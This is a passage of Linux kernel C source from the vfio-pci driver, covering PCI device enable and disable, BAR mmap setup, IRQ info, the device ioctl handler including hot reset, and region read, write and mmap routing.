if (single_vga || !vfio_vga_disabled() || pci_is_root_bus(pdev->bus))
return VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
max_busnr = pci_bus_max_busnr(pdev->bus);
decodes = VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM;
while ((tmp = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, tmp)) != NULL) {
if (tmp == pdev ||
pci_domain_nr(tmp->bus) != pci_domain_nr(pdev->bus) ||
pci_is_root_bus(tmp->bus))
continue;
if (tmp->bus->number >= pdev->bus->number &&
tmp->bus->number <= max_busnr) {
pci_dev_put(tmp);
decodes |= VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
break;
}
}
return decodes;
}
static inline bool vfio_pci_is_vga(struct pci_dev *pdev)
{
return (pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA;
}
static void vfio_pci_probe_mmaps(struct vfio_pci_device *vdev)
{
struct resource *res;
int bar;
struct vfio_pci_dummy_resource *dummy_res;
INIT_LIST_HEAD(&vdev->dummy_resources_list);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
res = vdev->pdev->resource + bar;
if (!IS_ENABLED(CONFIG_VFIO_PCI_MMAP))
goto no_mmap;
if (!(res->flags & IORESOURCE_MEM))
goto no_mmap;
/*
* The PCI core shouldn't set up a resource with a
* type but zero size. But there may be bugs that
* cause us to do that.
*/
if (!resource_size(res))
goto no_mmap;
if (resource_size(res) >= PAGE_SIZE) {
vdev->bar_mmap_supported[bar] = true;
continue;
}
if (!(res->start & ~PAGE_MASK)) {
/*
* Add a dummy resource to reserve the remainder
* of the exclusive page in case that hot-add
* device's bar is assigned into it.
*/
dummy_res = kzalloc(sizeof(*dummy_res), GFP_KERNEL);
if (dummy_res == NULL)
goto no_mmap;
dummy_res->resource.name = "vfio sub-page reserved";
dummy_res->resource.start = res->end + 1;
dummy_res->resource.end = res->start + PAGE_SIZE - 1;
dummy_res->resource.flags = res->flags;
if (request_resource(res->parent,
&dummy_res->resource)) {
kfree(dummy_res);
goto no_mmap;
}
dummy_res->index = bar;
list_add(&dummy_res->res_next,
&vdev->dummy_resources_list);
vdev->bar_mmap_supported[bar] = true;
continue;
}
/*
* Here we don't handle the case where the BAR is not page
* aligned, because we can't expect the BAR to be assigned to
* the same offset within a page in the guest when we pass
* the BAR through. It is also hard to access such a BAR from
* userspace, because we have no way to convey the BAR's
* offset within the page.
*/
no_mmap:
vdev->bar_mmap_supported[bar] = false;
}
}
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev);
static void vfio_pci_disable(struct vfio_pci_device *vdev);
/*
* INTx masking requires the ability to disable INTx signaling via PCI_COMMAND
* _and_ the ability to detect when the device is asserting INTx via PCI_STATUS.
* If a device implements the former but not the latter we would typically
* expect broken_intx_masking to be set and require an exclusive interrupt.
* However since we do have control of the device's ability to assert INTx,
* we can instead pretend that the device does not implement INTx, virtualizing
* the pin register to report zero and maintaining DisINTx set on the host.
*/
static bool vfio_pci_nointx(struct pci_dev *pdev)
{
switch (pdev->vendor) {
case PCI_VENDOR_ID_INTEL:
switch (pdev->device) {
/* All i40e (XL710/X710) 10/20/40GbE NICs */
case 0x1572:
case 0x1574:
case 0x1580 ... 0x1581:
case 0x1583 ... 0x1589:
case 0x37d0 ... 0x37d2:
return true;
default:
return false;
}
}
return false;
}
static int vfio_pci_enable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
int ret;
u16 cmd;
u8 msix_pos;
pci_set_power_state(pdev, PCI_D0);
/* Don't allow our initial saved state to include busmaster */
pci_clear_master(pdev);
ret = pci_enable_device(pdev);
if (ret)
return ret;
vdev->reset_works = (pci_reset_function(pdev) == 0);
pci_save_state(pdev);
vdev->pci_saved_state = pci_store_saved_state(pdev);
if (!vdev->pci_saved_state)
pr_debug("%s: Couldn't store %s saved state\n",
__func__, dev_name(&pdev->dev));
if (likely(!nointxmask)) {
if (vfio_pci_nointx(pdev)) {
dev_info(&pdev->dev, "Masking broken INTx support\n");
vdev->nointx = true;
pci_intx(pdev, 0);
} else
vdev->pci_2_3 = pci_intx_mask_supported(pdev);
}
pci_read_config_word(pdev, PCI_COMMAND, &cmd);
if (vdev->pci_2_3 && (cmd & PCI_COMMAND_INTX_DISABLE)) {
cmd &= ~PCI_COMMAND_INTX_DISABLE;
pci_write_config_word(pdev, PCI_COMMAND, cmd);
}
ret = vfio_config_init(vdev);
if (ret) {
kfree(vdev->pci_saved_state);
vdev->pci_saved_state = NULL;
pci_disable_device(pdev);
return ret;
}
msix_pos = pdev->msix_cap;
if (msix_pos) {
u16 flags;
u32 table;
pci_read_config_word(pdev, msix_pos + PCI_MSIX_FLAGS, &flags);
pci_read_config_dword(pdev, msix_pos + PCI_MSIX_TABLE, &table);
vdev->msix_bar = table & PCI_MSIX_TABLE_BIR;
vdev->msix_offset = table & PCI_MSIX_TABLE_OFFSET;
vdev->msix_size = ((flags & PCI_MSIX_FLAGS_QSIZE) + 1) * 16;
} else
vdev->msix_bar = 0xFF;
if (!vfio_vga_disabled() && vfio_pci_is_vga(pdev))
vdev->has_vga = true;
if (vfio_pci_is_vga(pdev) &&
pdev->vendor == PCI_VENDOR_ID_INTEL &&
IS_ENABLED(CONFIG_VFIO_PCI_IGD)) {
ret = vfio_pci_igd_init(vdev);
if (ret) {
dev_warn(&vdev->pdev->dev,
"Failed to setup Intel IGD regions\n");
vfio_pci_disable(vdev);
return ret;
}
}
vfio_pci_probe_mmaps(vdev);
return 0;
}
static void vfio_pci_disable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
struct vfio_pci_dummy_resource *dummy_res, *tmp;
int i, bar;
/* Stop the device from further DMA */
pci_clear_master(pdev);
vfio_pci_set_irqs_ioctl(vdev, VFIO_IRQ_SET_DATA_NONE |
VFIO_IRQ_SET_ACTION_TRIGGER,
vdev->irq_type, 0, 0, NULL);
vdev->virq_disabled = false;
for (i = 0; i < vdev->num_regions; i++)
vdev->region[i].ops->release(vdev, &vdev->region[i]);
vdev->num_regions = 0;
kfree(vdev->region);
vdev->region = NULL; /* don't krealloc a freed pointer */
vfio_config_free(vdev);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
if (!vdev->barmap[bar])
continue;
pci_iounmap(pdev, vdev->barmap[bar]);
pci_release_selected_regions(pdev, 1 << bar);
vdev->barmap[bar] = NULL;
}
list_for_each_entry_safe(dummy_res, tmp,
&vdev->dummy_resources_list, res_next) {
list_del(&dummy_res->res_next);
release_resource(&dummy_res->resource);
kfree(dummy_res);
}
vdev->needs_reset = true;
/*
* If we have saved state, restore it. If we can reset the device,
* even better. Resetting with current state seems better than
* nothing, but saving and restoring current state without reset
* is just busy work.
*/
if (pci_load_and_free_saved_state(pdev, &vdev->pci_saved_state)) {
pr_info("%s: Couldn't reload %s saved state\n",
__func__, dev_name(&pdev->dev));
if (!vdev->reset_works)
goto out;
pci_save_state(pdev);
}
/*
* Disable INTx and MSI, presumably to avoid spurious interrupts
* during reset. Stolen from pci_reset_function()
*/
pci_write_config_word(pdev, PCI_COMMAND, PCI_COMMAND_INTX_DISABLE);
/*
* Try to reset the device. The success of this is dependent on
* being able to lock the device, which is not always possible.
*/
if (vdev->reset_works && !pci_try_reset_function(pdev))
vdev->needs_reset = false;
pci_restore_state(pdev);
out:
pci_disable_device(pdev);
vfio_pci_try_bus_reset(vdev);
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D3hot);
}
static void vfio_pci_release(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&driver_lock);
if (!(--vdev->refcnt)) {
vfio_spapr_pci_eeh_release(vdev->pdev);
vfio_pci_disable(vdev);
}
mutex_unlock(&driver_lock);
module_put(THIS_MODULE);
}
static int vfio_pci_open(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
int ret = 0;
if (!try_module_get(THIS_MODULE))
return -ENODEV;
mutex_lock(&driver_lock);
if (!vdev->refcnt) {
ret = vfio_pci_enable(vdev);
if (ret)
goto error;
vfio_spapr_pci_eeh_open(vdev->pdev);
}
vdev->refcnt++;
error:
mutex_unlock(&driver_lock);
if (ret)
module_put(THIS_MODULE);
return ret;
}
static int vfio_pci_get_irq_count(struct vfio_pci_device *vdev, int irq_type)
{
if (irq_type == VFIO_PCI_INTX_IRQ_INDEX) {
u8 pin;
pci_read_config_byte(vdev->pdev, PCI_INTERRUPT_PIN, &pin);
if (IS_ENABLED(CONFIG_VFIO_PCI_INTX) && !vdev->nointx && pin)
return 1;
} else if (irq_type == VFIO_PCI_MSI_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msi_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSI_FLAGS, &flags);
return 1 << ((flags & PCI_MSI_FLAGS_QMASK) >> 1);
}
} else if (irq_type == VFIO_PCI_MSIX_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msix_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSIX_FLAGS, &flags);
return (flags & PCI_MSIX_FLAGS_QSIZE) + 1;
}
} else if (irq_type == VFIO_PCI_ERR_IRQ_INDEX) {
if (pci_is_pcie(vdev->pdev))
return 1;
} else if (irq_type == VFIO_PCI_REQ_IRQ_INDEX) {
return 1;
}
return 0;
}
static int vfio_pci_count_devs(struct pci_dev *pdev, void *data)
{
(*(int *)data)++;
return 0;
}
struct vfio_pci_fill_info {
int max;
int cur;
struct vfio_pci_dependent_device *devices;
};
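/*
 * pci_walk_bus() callback: record the IOMMU group ID and PCI address of each
 * device affected by a hot reset into the user-visible dependent device list.
 */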
static int vfio_pci_fill_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_fill_info *fill = data;
struct iommu_group *iommu_group;
if (fill->cur == fill->max)
return -EAGAIN; /* Something changed, try again */
iommu_group = iommu_group_get(&pdev->dev);
if (!iommu_group)
return -EPERM; /* Cannot reset non-isolated devices */
fill->devices[fill->cur].group_id = iommu_group_id(iommu_group);
fill->devices[fill->cur].segment = pci_domain_nr(pdev->bus);
fill->devices[fill->cur].bus = pdev->bus->number;
fill->devices[fill->cur].devfn = pdev->devfn;
fill->cur++;
iommu_group_put(iommu_group);
return 0;
}
struct vfio_pci_group_entry {
struct vfio_group *group;
int id;
};
struct vfio_pci_group_info {
int count;
struct vfio_pci_group_entry *groups;
};
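/*
 * pci_walk_bus() callback: fail unless the device's IOMMU group is one of the
 * groups the user passed in, i.e. the user owns every device touched by the
 * reset.
 */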
static int vfio_pci_validate_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_group_info *info = data;
struct iommu_group *group;
int id, i;
group = iommu_group_get(&pdev->dev);
if (!group)
return -EPERM;
id = iommu_group_id(group);
for (i = 0; i < info->count; i++)
if (info->groups[i].id == id)
break;
iommu_group_put(group);
return (i == info->count) ? -EINVAL : 0;
}
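/* Walk up the bus hierarchy to decide whether pdev sits below the given slot */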
static bool vfio_pci_dev_below_slot(struct pci_dev *pdev, struct pci_slot *slot)
{
for (; pdev; pdev = pdev->bus->self)
if (pdev->bus == slot->bus)
return (pdev->slot == slot);
return false;
}
struct vfio_pci_walk_info {
int (*fn)(struct pci_dev *, void *data);
void *data;
struct pci_dev *pdev;
bool slot;
int ret;
};
static int vfio_pci_walk_wrapper(struct pci_dev *pdev, void *data)
{
struct vfio_pci_walk_info *walk = data;
if (!walk->slot || vfio_pci_dev_below_slot(pdev, walk->pdev->slot))
walk->ret = walk->fn(pdev, walk->data);
return walk->ret;
}
static int vfio_pci_for_each_slot_or_bus(struct pci_dev *pdev,
int (*fn)(struct pci_dev *,
void *data), void *data,
bool slot)
{
struct vfio_pci_walk_info walk = {
.fn = fn, .data = data, .pdev = pdev, .slot = slot, .ret = 0,
};
pci_walk_bus(pdev->bus, vfio_pci_walk_wrapper, &walk);
return walk.ret;
}
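/*
 * Build a sparse mmap capability for the MSI-X BAR describing the ranges the
 * user may mmap, i.e. everything except the page(s) holding the MSI-X table.
 */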
static int msix_sparse_mmap_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_sparse_mmap *sparse;
size_t end, size;
int nr_areas = 2, i = 0;
end = pci_resource_len(vdev->pdev, vdev->msix_bar);
/* If MSI-X table is aligned to the start or end, only one area */
if (((vdev->msix_offset & PAGE_MASK) == 0) ||
(PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) >= end))
nr_areas = 1;
size = sizeof(*sparse) + (nr_areas * sizeof(*sparse->areas));
header = vfio_info_cap_add(caps, size,
VFIO_REGION_INFO_CAP_SPARSE_MMAP, 1);
if (IS_ERR(header))
return PTR_ERR(header);
sparse = container_of(header,
struct vfio_region_info_cap_sparse_mmap, header);
sparse->nr_areas = nr_areas;
if (vdev->msix_offset & PAGE_MASK) {
sparse->areas[i].offset = 0;
sparse->areas[i].size = vdev->msix_offset & PAGE_MASK;
i++;
}
if (PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) < end) {
sparse->areas[i].offset = PAGE_ALIGN(vdev->msix_offset +
vdev->msix_size);
sparse->areas[i].size = end - sparse->areas[i].offset;
i++;
}
return 0;
}
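/* Attach a type/subtype capability describing a device-specific region */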
static int region_type_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps,
unsigned int type, unsigned int subtype)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_type *cap;
header = vfio_info_cap_add(caps, sizeof(*cap),
VFIO_REGION_INFO_CAP_TYPE, 1);
if (IS_ERR(header))
return PTR_ERR(header);
cap = container_of(header, struct vfio_region_info_cap_type, header);
cap->type = type;
cap->subtype = subtype;
return 0;
}
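/*
 * Append a device-specific region to the vdev's region array; the array is
 * grown with krealloc() and released again in vfio_pci_disable().
 */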
int vfio_pci_register_dev_region(struct vfio_pci_device *vdev,
unsigned int type, unsigned int subtype,
const struct vfio_pci_regops *ops,
size_t size, u32 flags, void *data)
{
struct vfio_pci_region *region;
region = krealloc(vdev->region,
(vdev->num_regions + 1) * sizeof(*region),
GFP_KERNEL);
if (!region)
return -ENOMEM;
vdev->region = region;
vdev->region[vdev->num_regions].type = type;
vdev->region[vdev->num_regions].subtype = subtype;
vdev->region[vdev->num_regions].ops = ops;
vdev->region[vdev->num_regions].size = size;
vdev->region[vdev->num_regions].flags = flags;
vdev->region[vdev->num_regions].data = data;
vdev->num_regions++;
return 0;
}
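/*
 * Top-level ioctl handler: dispatches VFIO_DEVICE_GET_INFO, GET_REGION_INFO,
 * GET_IRQ_INFO, SET_IRQS, RESET and the hot reset ioctls, validating the
 * user-supplied argsz/flags/index values before acting on them.
 */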
static long vfio_pci_ioctl(void *device_data,
unsigned int cmd, unsigned long arg)
{
struct vfio_pci_device *vdev = device_data;
unsigned long minsz;
if (cmd == VFIO_DEVICE_GET_INFO) {
struct vfio_device_info info;
minsz = offsetofend(struct vfio_device_info, num_irqs);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
info.flags = VFIO_DEVICE_FLAGS_PCI;
if (vdev->reset_works)
info.flags |= VFIO_DEVICE_FLAGS_RESET;
info.num_regions = VFIO_PCI_NUM_REGIONS + vdev->num_regions;
info.num_irqs = VFIO_PCI_NUM_IRQS;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_REGION_INFO) {
struct pci_dev *pdev = vdev->pdev;
struct vfio_region_info info;
struct vfio_info_cap caps = { .buf = NULL, .size = 0 };
int i, ret;
minsz = offsetofend(struct vfio_region_info, offset);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pdev->cfg_size;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
info.flags = 0;
break;
}
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
if (vdev->bar_mmap_supported[info.index]) {
info.flags |= VFIO_REGION_INFO_FLAG_MMAP;
if (info.index == vdev->msix_bar) {
ret = msix_sparse_mmap_cap(vdev, &caps);
if (ret)
return ret;
}
}
break;
case VFIO_PCI_ROM_REGION_INDEX:
{
void __iomem *io;
size_t size;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.flags = 0;
/* Report the BAR size, not the ROM size */
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
/* Shadow ROMs appear as PCI option ROMs */
if (pdev->resource[PCI_ROM_RESOURCE].flags &
IORESOURCE_ROM_SHADOW)
info.size = 0x20000;
else
break;
}
/* Is it really there? */
io = pci_map_rom(pdev, &size);
if (!io || !size) {
info.size = 0;
break;
}
pci_unmap_rom(pdev, io);
info.flags = VFIO_REGION_INFO_FLAG_READ;
break;
}
case VFIO_PCI_VGA_REGION_INDEX:
if (!vdev->has_vga)
return -EINVAL;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = 0xc0000;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
default:
if (info.index >=
VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
i = info.index - VFIO_PCI_NUM_REGIONS;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = vdev->region[i].size;
info.flags = vdev->region[i].flags;
ret = region_type_cap(vdev, &caps,
vdev->region[i].type,
vdev->region[i].subtype);
if (ret)
return ret;
}
if (caps.size) {
info.flags |= VFIO_REGION_INFO_FLAG_CAPS;
if (info.argsz < sizeof(info) + caps.size) {
info.argsz = sizeof(info) + caps.size;
info.cap_offset = 0;
} else {
vfio_info_cap_shift(&caps, sizeof(info));
if (copy_to_user((void __user *)arg +
sizeof(info), caps.buf,
caps.size)) {
kfree(caps.buf);
return -EFAULT;
}
info.cap_offset = sizeof(info);
}
kfree(caps.buf);
}
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_IRQ_INFO) {
struct vfio_irq_info info;
minsz = offsetofend(struct vfio_irq_info, count);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz || info.index >= VFIO_PCI_NUM_IRQS)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_INTX_IRQ_INDEX ... VFIO_PCI_MSIX_IRQ_INDEX:
case VFIO_PCI_REQ_IRQ_INDEX:
break;
case VFIO_PCI_ERR_IRQ_INDEX:
if (pci_is_pcie(vdev->pdev))
break;
/* pass thru to return error */
default:
return -EINVAL;
}
info.flags = VFIO_IRQ_INFO_EVENTFD;
info.count = vfio_pci_get_irq_count(vdev, info.index);
if (info.index == VFIO_PCI_INTX_IRQ_INDEX)
info.flags |= (VFIO_IRQ_INFO_MASKABLE |
VFIO_IRQ_INFO_AUTOMASKED);
else
info.flags |= VFIO_IRQ_INFO_NORESIZE;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_SET_IRQS) {
struct vfio_irq_set hdr;
size_t size;
u8 *data = NULL;
int max, ret = 0;
minsz = offsetofend(struct vfio_irq_set, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.index >= VFIO_PCI_NUM_IRQS ||
hdr.count >= (U32_MAX - hdr.start) ||
hdr.flags & ~(VFIO_IRQ_SET_DATA_TYPE_MASK |
VFIO_IRQ_SET_ACTION_TYPE_MASK))
return -EINVAL;
max = vfio_pci_get_irq_count(vdev, hdr.index);
if (hdr.start >= max || hdr.start + hdr.count > max)
return -EINVAL;
switch (hdr.flags & VFIO_IRQ_SET_DATA_TYPE_MASK) {
case VFIO_IRQ_SET_DATA_NONE:
size = 0;
break;
case VFIO_IRQ_SET_DATA_BOOL:
size = sizeof(uint8_t);
break;
case VFIO_IRQ_SET_DATA_EVENTFD:
size = sizeof(int32_t);
break;
default:
return -EINVAL;
}
if (size) {
if (hdr.argsz - minsz < hdr.count * size)
return -EINVAL;
data = memdup_user((void __user *)(arg + minsz),
hdr.count * size);
if (IS_ERR(data))
return PTR_ERR(data);
}
mutex_lock(&vdev->igate);
ret = vfio_pci_set_irqs_ioctl(vdev, hdr.flags, hdr.index,
hdr.start, hdr.count, data);
mutex_unlock(&vdev->igate);
kfree(data);
return ret;
} else if (cmd == VFIO_DEVICE_RESET) {
return vdev->reset_works ?
pci_try_reset_function(vdev->pdev) : -EINVAL;
} else if (cmd == VFIO_DEVICE_GET_PCI_HOT_RESET_INFO) {
struct vfio_pci_hot_reset_info hdr;
struct vfio_pci_fill_info fill = { 0 };
struct vfio_pci_dependent_device *devices = NULL;
bool slot = false;
int ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset_info, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz)
return -EINVAL;
hdr.flags = 0;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/* How many devices are affected? */
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&fill.max, slot);
if (ret)
return ret;
WARN_ON(!fill.max); /* Should always be at least one */
/*
* If there's enough space, fill it now, otherwise return
* -ENOSPC and the number of devices affected.
*/
if (hdr.argsz < sizeof(hdr) + (fill.max * sizeof(*devices))) {
ret = -ENOSPC;
hdr.count = fill.max;
goto reset_info_exit;
}
devices = kcalloc(fill.max, sizeof(*devices), GFP_KERNEL);
if (!devices)
return -ENOMEM;
fill.devices = devices;
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_fill_devs,
&fill, slot);
/*
* If a device was removed between counting and filling,
* we may come up short of fill.max. If a device was
* added, we'll have a return of -EAGAIN above.
*/
if (!ret)
hdr.count = fill.cur;
reset_info_exit:
if (copy_to_user((void __user *)arg, &hdr, minsz))
ret = -EFAULT;
if (!ret) {
if (copy_to_user((void __user *)(arg + minsz), devices,
hdr.count * sizeof(*devices)))
ret = -EFAULT;
}
kfree(devices);
return ret;
} else if (cmd == VFIO_DEVICE_PCI_HOT_RESET) {
struct vfio_pci_hot_reset hdr;
int32_t *group_fds;
struct vfio_pci_group_entry *groups;
struct vfio_pci_group_info info;
bool slot = false;
int i, count = 0, ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.flags)
return -EINVAL;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/*
* We can't let userspace give us an arbitrarily large
* buffer to copy, so verify how many we think there
* could be. Note groups can have multiple devices so
* one group per device is the max.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&count, slot);
if (ret)
return ret;
/* Somewhere between 1 and count is OK */
if (!hdr.count || hdr.count > count)
return -EINVAL;
group_fds = kcalloc(hdr.count, sizeof(*group_fds), GFP_KERNEL);
groups = kcalloc(hdr.count, sizeof(*groups), GFP_KERNEL);
if (!group_fds || !groups) {
kfree(group_fds);
kfree(groups);
return -ENOMEM;
}
if (copy_from_user(group_fds, (void __user *)(arg + minsz),
hdr.count * sizeof(*group_fds))) {
kfree(group_fds);
kfree(groups);
return -EFAULT;
}
/*
* For each group_fd, get the group through the vfio external
* user interface and store the group and iommu ID. This
* ensures the group is held across the reset.
*/
for (i = 0; i < hdr.count; i++) {
struct vfio_group *group;
struct fd f = fdget(group_fds[i]);
if (!f.file) {
ret = -EBADF;
break;
}
group = vfio_group_get_external_user(f.file);
fdput(f);
if (IS_ERR(group)) {
ret = PTR_ERR(group);
break;
}
groups[i].group = group;
groups[i].id = vfio_external_user_iommu_id(group);
}
kfree(group_fds);
/* release reference to groups on error */
if (ret)
goto hot_reset_release;
info.count = hdr.count;
info.groups = groups;
/*
* Test whether all the affected devices are contained
* by the set of groups provided by the user.
*/
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_validate_devs,
&info, slot);
if (!ret)
/* User has access, do the reset */
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
hot_reset_release:
for (i--; i >= 0; i--)
vfio_group_put_external_user(groups[i].group);
kfree(groups);
return ret;
}
return -ENOTTY;
}
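/* Route read/write accesses to the handler for the region selected by *ppos */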
static ssize_t vfio_pci_rw(void *device_data, char __user *buf,
size_t count, loff_t *ppos, bool iswrite)
{
unsigned int index = VFIO_PCI_OFFSET_TO_INDEX(*ppos);
struct vfio_pci_device *vdev = device_data;
if (index >= VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
switch (index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
return vfio_pci_config_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_ROM_REGION_INDEX:
if (iswrite)
return -EINVAL;
return vfio_pci_bar_rw(vdev, buf, count, ppos, false);
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
return vfio_pci_bar_rw(vdev, buf, count, ppos, iswrite);
case VFIO_PCI_VGA_REGION_INDEX:
return vfio_pci_vga_rw(vdev, buf, count, ppos, iswrite);
default:
index -= VFIO_PCI_NUM_REGIONS;
return vdev->region[index].ops->rw(vdev, buf,
count, ppos, iswrite);
}
return -EINVAL;
}
static ssize_t vfio_pci_read(void *device_data, char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, buf, count, ppos, false);
}
static ssize_t vfio_pci_write(void *device_data, const char __user *buf,
size_t count, loff_t *ppos)
{
if (!count)
return 0;
return vfio_pci_rw(device_data, (char __user *)buf, count, ppos, true);
}
static int vfio_pci_mmap(void *device_data, struct vm_area_struct *vma)
{
struct vfio_pci_device *vdev = device_data;
struct pci_dev *pdev = vdev->pdev;
unsigned int index;
u64 phys_len, req_len, pgoff, req_start;
int ret;
index = vma->vm_pgoff >> (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT);
if (vma->vm_end < vma->vm_start)
return -EINVAL;
if ((vma->vm_flags & VM_SHARED) == 0)
return -EINVAL;
if (index >= VFIO_PCI_ROM_REGION_INDEX)
return -EINVAL;
if (!vdev->bar_mmap_supported[index])
return -EINVAL;
phys_len = PAGE_ALIGN(pci_resource_len(pdev, index));
req_len = vma->vm_end - vma->vm_start;
pgoff = vma->vm_pgoff &
((1U << (VFIO_PCI_OFFSET_SHIFT - PAGE_SHIFT)) - 1);
req_start = pgoff << PAGE_SHIFT;
if (req_start + req_len > phys_len)
return -EINVAL;
if (index == vdev->msix_bar) {
/*
* Disallow mmaps overlapping the MSI-X table; users don't
* get to touch this directly. We could find somewhere
* else to map the overlap, but page granularity is only
* a recommendation, not a requirement, so the user needs
* to know which bits are real. Requiring them to mmap
* around the table makes that clear.
*/
/* If neither entirely above nor below, then it overlaps */
if (!(req_start >= vdev->msix_offset + vdev->msix_size ||
req_start + req_len <= vdev->msix_offset))
return -EINVAL;
}
/*
* Even though we don't make use of the barmap for the mmap,
* we need to request the region and the barmap tracks that.
*/
if (!vdev->barmap[index]) {
ret = pci_request_selected_regions(pdev,
1 << index, "vfio-pci");
if (ret)
return ret;
vdev->barmap[index] = pci_iomap(pdev, index, 0);
}
vma->vm_private_data = vdev;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
vma->vm_pgoff = (pci_resource_start(pdev, index) >> PAGE_SHIFT) + pgoff;
return remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
req_len, vma->vm_page_prot);
}
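/*
 * Relay a device request to userspace through the request eventfd so the user
 * can release the device; warn if no eventfd has been registered.
 */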
static void vfio_pci_request(void *device_data, unsigned int count)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&vdev->igate);
if (vdev->req_trigger) {
if (!(count % 10))
dev_notice_ratelimited(&vdev->pdev->dev,
"Relaying device request to user (#%u)\n",
count);
eventfd_signal(vdev->req_trigger, 1);
} else if (count == 0) {
dev_warn(&vdev->pdev->dev,
"No device request channel registered, blocked until released by user\n");
}
mutex_unlock(&vdev->igate);
}
static const struct vfio_device_ops vfio_pci_ops = {
.name = "vfio-pci",
.open = vfio_pci_open,
.release = vfio_pci_release,
.ioctl = vfio_pci_ioctl,
.read = vfio_pci_read,
.write = vfio_pci_write,
.mmap = vfio_pci_mmap,
.request = vfio_pci_request,
};
static int vfio_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
{
struct vfio_pci_device *vdev;
struct iommu_group *group;
int ret;
if (pdev->hdr_type != PCI_HEADER_TYPE_NORMAL)
return -EINVAL;
group = vfio_iommu_group_get(&pdev->dev);
if (!group)
return -EINVAL;
vdev = kzalloc(sizeof(*vdev), GFP_KERNEL);
if (!vdev) {
vfio_iommu_group_put(group, &pdev->dev);
return -ENOMEM;
}
vdev->pdev = pdev;
vdev->irq_type = VFIO_PCI_NUM_IRQS;
